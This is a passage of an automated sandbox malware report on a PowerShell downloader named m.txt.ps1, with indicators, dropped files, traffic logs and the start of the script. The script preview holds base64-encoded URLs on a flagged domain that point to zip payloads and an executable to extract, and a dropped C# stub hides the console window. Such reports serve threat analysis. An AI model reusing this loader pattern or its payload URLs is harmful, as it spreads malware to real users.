      http://digitalarmor.cyoupowershell.exe, 00000000.00000002.1507538284.0000027DB877A000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1524880734.0000027DC6A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zipppowershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1507538284.0000027DB6AF2000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1507538284.0000027DB6AF2000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://go.micropowershell.exe, 00000000.00000002.1507538284.0000027DB74F2000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://digitalarmor.cyoupowershell.exe, 00000000.00000002.1507538284.0000027DB8746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1524880734.0000027DC6A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.1524880734.0000027DC692E000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1507538284.0000027DB68C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1507538284.0000027DB68C1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1507538284.0000027DB6AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000000.00000002.1507538284.0000027DB87A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB89C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB87A0000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.212.107
                              digitalarmor.cyouUnited States
                              13335CLOUDFLARENETUSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1583788
                              Start date and time:2025-01-03 15:20:12 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 38s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:m.txt.ps1
                              Detection:MAL
                              Classification:mal68.expl.evad.winPS1@6/11@1/1
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 3
                              • Number of non-executed functions: 1
                              Cookbook Comments:
                              • Found application associated with file extension: .ps1
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 20.12.23.50
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7256 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              TimeTypeDescription
                              09:21:11API Interceptor44x Sleep call for process: powershell.exe modified
                              No context
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUShttps://t.co/jNNzVU90SAGet hashmaliciousHTMLPhisherBrowse
                              • 188.114.96.3
                              nayfObR.exeGet hashmaliciousLummaCBrowse
                              • 104.21.32.1
                              http://www.klim.comGet hashmaliciousUnknownBrowse
                              • 104.18.27.193
                              XClient.exeGet hashmaliciousXWormBrowse
                              • 172.67.19.24
                              7z91gvU.exeGet hashmaliciousLummaCBrowse
                              • 104.21.96.1
                              https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                              • 104.26.13.205
                              mode11_0HVJ.exeGet hashmaliciousCobaltStrikeBrowse
                              • 188.114.96.3
                              https://goatstuff.sbs/re5.mp4Get hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              mode11_AKUh.exeGet hashmaliciousCobaltStrikeBrowse
                              • 188.114.96.3
                              mode11_qLf2.exeGet hashmaliciousCobaltStrikeBrowse
                              • 188.114.97.3
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eXClient.exeGet hashmaliciousXWormBrowse
                              • 172.67.212.107
                              1111.htaGet hashmaliciousUnknownBrowse
                              • 172.67.212.107
                              qwertyuiopasdfghjklzxcvbnm.htaGet hashmaliciousUnknownBrowse
                              • 172.67.212.107
                              W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.212.107
                              FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.212.107
                              2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                              • 172.67.212.107
                              RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                              • 172.67.212.107
                              RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                              • 172.67.212.107
                              ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                              • 172.67.212.107
                              No context
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:Nlllul9ihlh:NllUAz
                              MD5:830AC629DD1BABB2E1751C8179DEA540
                              SHA1:6946CA8BF7F06C5B5C71EF87C5EA127CCAFF314F
                              SHA-256:28B0A04C474D380F43D118BAAE1C2F19ABA78F0A9FF2ACB6B3CEA50D19C88DEB
                              SHA-512:378D13B562A62B5AE492EEC2D539D1112A4C90460ADAD60EC7BA8A2130C5B846B0D4CFB3CC0E07E564A4E7A959E143D23D4FB2E23832D301C4263A4AA1E3A32A
                              Malicious:false
                              Reputation:low
                              Preview:@...e.................................l.&............@..........
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Jan 3 16:05:40 2025, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1336
                              Entropy (8bit):4.003498016107789
                              Encrypted:false
                              SSDEEP:24:H1m9IaXCQHKwKRmNII+ycuZhN2akSOPNnqSSd:V6CQBKRmu1ul2a3SqSC
                              MD5:7B453C9E4203826E894DE7D857B805F7
                              SHA1:CA02C12ED50AC265EA96EC01BA205F3DEACFF303
                              SHA-256:2423D27EA572D1B35ED807C3B692E5275C09872D1A3D74D15B59B952755858BF
                              SHA-512:8CA8246008ABB27CDD7684C4CC94B25C0E6A948E0860208DFB40BB5523C90E4F83F5949A72B6132A205AD115EACC0C0FD8085EF458E15A7A56A2F7254109FFFF
                              Malicious:false
                              Reputation:low
                              Preview:L.....xg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\jjfh4dlp\CSC54EE39D9867F4A06B1E0C15F7422FD6E.TMP...................U...b$.L9.'.g.~..........5.......C:\Users\user\AppData\Local\Temp\RESD0D5.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.j.f.h.4.d.l.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.1004773640617675
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYak7YnqqOPN5Dlq5J:+RI+ycuZhN2akSOPNnqX
                              MD5:DE5594ECD86224EE4C39FA27BF67C97E
                              SHA1:9CD3645EFDFF3730AE5685A46BAF931D93555D34
                              SHA-256:80435F2153797AB9E6B0116DAC8029895BD53C31F5CD6241C7B5AD1CDCAAB7B8
                              SHA-512:EABC06B26871B54528D8501092FDA3A7346966FF7D4A195DCF4E331DF5525F13F0F7B3722F3863C0D8C31A8C19DD1FB6974E6E8EE3C6BDDE9D5469EB19D3C169
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.j.f.h.4.d.l.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.j.f.h.4.d.l.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text
                              Category:dropped
                              Size (bytes):256
                              Entropy (8bit):4.93192231357311
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS86pnuMGiNFs2SRaiWhM/siNFs2SRkoSoODW:V/DTLDCaWYI9OW
                              MD5:61C8EFABA2783745F312409E9781ACE5
                              SHA1:1EF8FD088AA3102D836E8C96E13B7E20DBCFCF6D
                              SHA-256:94AE7A0BB45E6F9DCDFB159C05223E407D76DD71F26E74B6651DA1D0DF71BD39
                              SHA-512:2177740DCF143876BBBDBE5DDBF72F3A497B0120BDC55BCFF8F142002FC82DD36B373C1E883AFC05D59045E3E0AF0DF6D42BDCE7264C9DA6BF2425211744EE26
                              Malicious:false
                              Preview:.using System;.using System.Runtime.InteropServices;.public class W {. [DllImport("kernel32.dll")]. public static extern IntPtr GetConsoleWindow();. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.}
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                              Category:dropped
                              Size (bytes):371
                              Entropy (8bit):5.272147554016185
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fszxs7+AEszICHhJ23fJn:p37Lvkmb6KiEWZEvB
                              MD5:F12FEFAF761ED88437C98325ECB78A7F
                              SHA1:EDF4B4A6948C24999959BAF3526F0B2E9CAEDCFA
                              SHA-256:6D42E874B74CF2630A017170DCBE6C5DEA15BF648C701A67767720A1194BE0F2
                              SHA-512:5DC6F5367F2B603EC0CC6F5516349E8BC1DAEE2B282F06A7AD8E46FBFF6A81210682530D12C146FFE226FFB0448EC5427467F531CD98CC67E4C554A1CE0D6E22
                              Malicious:true
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3072
                              Entropy (8bit):2.800307187882315
                              Encrypted:false
                              SSDEEP:24:etGSyPBG5ebGp8I9LBwRVZetkZfGPdVUkWI+ycuZhN2akSOPNnq:6hsVIZSRzRJ0dVUH1ul2a3Sq
                              MD5:AAB2D0065775E4833589FC6BFE72B16B
                              SHA1:59E2DE641312047361AFB43C2300261D4EA97EFD
                              SHA-256:831B261A653A569B6ABB06B3337AECD52377B80222FD946DB82FC34BCBC4B5FC
                              SHA-512:70690899664A8BEF8660D3EA4D11D5C34BEDCFDF9B8AF96310216670C133EB854C419228A8A3C709510E3809E2761B7909F7F0C3F890FEE0F621E99574E3D8C7
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................).".....`.....`.......................................... 0............ A.....P ......L.........R.....W...L.....L...!.L.....L.......".....+.........0.......A................................................<Module
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):872
                              Entropy (8bit):5.331608442268409
                              Encrypted:false
                              SSDEEP:24:KOId3ka6KilEvkKax5DqBVKVrdFAMBJTH:xkka6LlEvkK2DcVKdBJj
                              MD5:53BD289DAC05C211590876ED4DD60B44
                              SHA1:7471BD66207651BC903FDA242E60B2A09C92581A
                              SHA-256:067C4AE82CAD783286744C0BB6970832A6841DB82B7CE842D9BBABD879946AEF
                              SHA-512:1749ECE6557F83C660A977A70225468AC65194C8EC18C83C8AB74672E66997082F86409E4F1143DBF78288F89EE8582A63E549898548722181D030659031D512
                              Malicious:false
                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
                              Entropy (8bit):3.7174392430978322
                              Encrypted:false
                              SSDEEP:96:ZcE3C7P8okvhkvCCtUf5WiNH3d5Wi1H3t:ZcEAPnUf5Td5rt
                              MD5:366241E49EA0C0FC839452B30018724D
                              SHA1:EE8447047473D40F5B458F5CE53833DE5272214F
                              SHA-256:7D568645D44C7FAB9480DB8439AF1E30B75D3A45369ECAC904EBE20F9DD82B65
                              SHA-512:2080CCAB72F5BE61AE3D03B4F8D31B85680FB97ED9DFAC442D3424DB788DFC1E00324E364B1C2F87099BC004E986CC4BE679D885CBC7A5256E77A7A34BA96475
                              Malicious:false
                              Preview:...................................FL..................F.".. ......Yd.....%..]..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...c_...]....1..]......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B#Z.r..........................d...A.p.p.D.a.t.a...B.V.1.....#Z.r..Roaming.@......EW)B#Z.r............................_.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B#Z.r............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B#Z.r..........................D...W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B#Z.r....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B#Z.r....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B#Z.r.....0..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
                              Entropy (8bit):3.7174392430978322
                              Encrypted:false
                              SSDEEP:96:ZcE3C7P8okvhkvCCtUf5WiNH3d5Wi1H3t:ZcEAPnUf5Td5rt
                              MD5:366241E49EA0C0FC839452B30018724D
                              SHA1:EE8447047473D40F5B458F5CE53833DE5272214F
                              SHA-256:7D568645D44C7FAB9480DB8439AF1E30B75D3A45369ECAC904EBE20F9DD82B65
                              SHA-512:2080CCAB72F5BE61AE3D03B4F8D31B85680FB97ED9DFAC442D3424DB788DFC1E00324E364B1C2F87099BC004E986CC4BE679D885CBC7A5256E77A7A34BA96475
                              Malicious:false
                              Preview:...................................FL..................F.".. ......Yd.....%..]..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...c_...]....1..]......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B#Z.r..........................d...A.p.p.D.a.t.a...B.V.1.....#Z.r..Roaming.@......EW)B#Z.r............................_.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B#Z.r............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B#Z.r..........................D...W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B#Z.r....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B#Z.r....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B#Z.r.....0..........
                              File type:ASCII text
                              Entropy (8bit):5.219122777157498
                              TrID:
                                File name:m.txt.ps1
                                File size:1'688 bytes
                                MD5:d209d2e17ed62b29b2259d7fdc108e99
                                SHA1:d299eb8e04782a8b2922058dad8ace6264fd46d3
                                SHA256:140c357f592d4e1614584f1c753e1a9791bb27693d07fde44fe00d00da0923d4
                                SHA512:f8e286d0a856e891d82a7f27d240470d7c3e4264ae7af4df876214c9986e0cbdb58d18cf43d16f9b4f07d23a2b2b4e60272006f6ac6629130f18331dc3cd950f
                                SSDEEP:48:o9VrrC9LYyEj7cTW31K9mZSQM6YQ0CoxNVbbG:o9pe9syEjZCeSQMHQ0hlG
                                TLSH:97310E38BAE54E7012A3452249AB8166732E551F213A1E00392CF3C0EF4A32ECA693DD
                                File Content Preview:$e = @(. @{u="aHR0cHM6Ly9kaWdpdGFsYXJtb3IuY3lvdS8xMjM0L2Jmb2l1eXdoOThlcnR5aC9ncmV3ZzU0Mi56aXA=";z="ZG93bmxvYWQuemlw";x="ZXh0cmFjdA==";e="SVVTZXJ2aWNlLmV4ZQ=="},. @{u="aHR0cHM6Ly9kaWdpdGFsYXJtb3IuY3lvdS8xMjM0L2Jmb2l1eXdoOThlcnR5aC84OTc2NTQuemlw";z="Z
                                Icon Hash:3270d6baae77db44
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2025-01-03T15:21:19.277414+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849706172.67.212.107443TCP
                                2025-01-03T15:21:20.075739+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849707172.67.212.107443TCP
                                2025-01-03T15:21:20.075739+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707172.67.212.107443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 3, 2025 15:21:18.574888945 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:18.574933052 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:18.574990988 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:18.660459042 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:18.660482883 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.142786026 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.142915964 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.146501064 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.146508932 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.146722078 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.161077976 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.207328081 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277417898 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277473927 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277506113 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277527094 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277527094 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.277548075 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277573109 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.277602911 CET44349706172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.277651072 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.356421947 CET49706443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.478512049 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.478568077 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.478684902 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.479011059 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.479029894 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.933731079 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:19.943155050 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:19.943190098 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075737000 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075784922 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075828075 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075851917 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:20.075862885 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075872898 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075900078 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:20.075951099 CET44349707172.67.212.107192.168.2.8
                                Jan 3, 2025 15:21:20.075989008 CET49707443192.168.2.8172.67.212.107
                                Jan 3, 2025 15:21:20.089541912 CET49707443192.168.2.8172.67.212.107
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 3, 2025 15:21:18.502851963 CET5969353192.168.2.81.1.1.1
                                Jan 3, 2025 15:21:18.515964031 CET53596931.1.1.1192.168.2.8
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jan 3, 2025 15:21:18.502851963 CET192.168.2.81.1.1.10x39e6Standard query (0)digitalarmor.cyouA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jan 3, 2025 15:21:18.515964031 CET1.1.1.1192.168.2.80x39e6No error (0)digitalarmor.cyou172.67.212.107A (IP address)IN (0x0001)false
                                Jan 3, 2025 15:21:18.515964031 CET1.1.1.1192.168.2.80x39e6No error (0)digitalarmor.cyou104.21.37.189A (IP address)IN (0x0001)false
                                • digitalarmor.cyou
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849706172.67.212.1074437256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2025-01-03 14:21:19 UTC195OUTGET /1234/bfoiuywh98ertyh/grewg542.zip HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: digitalarmor.cyou
                                Connection: Keep-Alive
                                2025-01-03 14:21:19 UTC560INHTTP/1.1 403 Forbidden
                                Date: Fri, 03 Jan 2025 14:21:19 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tcfyGYLRafD%2BrQtVI6m9FDA7W8fMT1mUtCZfpeZ05eCICqBEvDK63NVU6BBbPExbxhU2%2BsFpHGroTbHw1kUy1ShjfdPDMgGaDIlfE30jzc4eJwZV5s9tZ0NiPspzwDmQNL4%2BeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8fc3a2732fdf8c93-EWR
